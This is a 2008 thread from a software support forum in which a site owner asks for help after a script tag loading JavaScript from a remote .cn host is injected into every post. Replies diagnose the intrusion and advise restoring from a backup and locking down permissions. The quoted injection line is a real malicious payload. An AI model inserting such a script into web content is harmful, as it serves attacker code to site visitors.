HELP!!!!!
Printed From: Web Wiz Forums
Category: Web Wiz Web App Support Forums
Forum Name: Web Wiz Forums
Forum Description: Support forum for Web Wiz Forums application.
URL: https://forums.webwiz.net/forum_posts.asp?TID=25873
Printed Date: 03 April 2026 at 11:03am
Software Version: Web Wiz Forums 12.08 - https://www.webwizforums.com
Topic: HELP!!!!!
Posted By: attack_help
Subject: HELP!!!!!
Date Posted: 22 June 2008 at 3:00pm
|
Hello, my site is under attack by something or someone - they are injecting code into my forum msg posts? HELP - Someone contact me immediatelly. It is injecting this into each message posted: <script src=http://www.j8j8hei.cn/k.js></script> |
Replies:
Posted By: attack_help
Date Posted: 22 June 2008 at 3:01pm
| I am seeking help from anyone who has had this ussue and from the web wiz people!!!! |
Posted By: 123Simples
Date Posted: 22 June 2008 at 4:01pm
Link to your forum please as I don't think anyone is just going to try and click on an unidentified javascript function me thinks 
------------- http://www.123simples.com/" rel="nofollow - Visit 123 Simples Web Design |
Posted By: Jono
Date Posted: 22 June 2008 at 4:11pm
| What version of the software are you running? I've had a quick look and can't replicate it in version 9.5. |
Posted By: attack_help
Date Posted: 22 June 2008 at 4:58pm
| the newest version - bought last night - 9.x? |
Posted By: attack_help
Date Posted: 22 June 2008 at 4:59pm
|
Sorry about that - here is the link
http://www.suzukiownersclub.org/forum/ -
|
MrTWS wrote:Posted By: Jono
Date Posted: 22 June 2008 at 5:10pm
| Is it just on the topics you post? Are you 'Stone'? I can't view the source code (in IE), so i can't see where the injection is being placed. |
Posted By: Jono
Date Posted: 22 June 2008 at 5:14pm
| Information here: http://s3cwatch.wordpress.com/2008/06/22/wwwj8j8heicnkjs/ - http://s3cwatch.wordpress.com/2008/06/22/wwwj8j8heicnkjs/ |
Posted By: 123Simples
Date Posted: 22 June 2008 at 5:57pm
Could it perhaps be coming from site meter? which you have on your footer section. Whatever is doing this is using javascript but Bruce may have a better answer than this ------------- http://www.123simples.com/" rel="nofollow - Visit 123 Simples Web Design |
Posted By: 123Simples
Date Posted: 22 June 2008 at 6:09pm
|
I can tell you exactly what you have done wrong and why someone is abusing your forum Post edited at request of forum member ------------- http://www.123simples.com/" rel="nofollow - Visit 123 Simples Web Design |
Posted By: 123Simples
Date Posted: 22 June 2008 at 6:57pm
|
User has removed their file as shown above Bruce or anyone else knowledgeable - can you assure the forum member that their database should now be secure? ------------- http://www.123simples.com/" rel="nofollow - Visit 123 Simples Web Design |
Posted By: attack_help
Date Posted: 22 June 2008 at 7:07pm
| Thanks MrTWS - sometimes just having someone standing next to you gives you hope!!! |
Posted By: WebWiz-Bruce
Date Posted: 23 June 2008 at 8:52am
|
Had someone with a simular issue a few months back. It turned out eventually that the hacker had got in through lax site permissions and had placed code into another file outside of the forum. The hacking itself wasn't forum related, but the hacker had placed code in this other file which had an SQL Query in it which every time the file was called it would place a similar javascript into the majority of fields within the SQL Server database. You should delete your entire site and reupload from the last safe backup you have. You should also make sure that you have read only permissions on your web site. ------------- https://www.webwiz.net/web-wiz-forums/forum-hosting.htm" rel="nofollow - Web Wiz Forums Hosting https://www.webwiz.net/web-hosting/windows-web-hosting.htm" rel="nofollow - ASP.NET Web Hosting |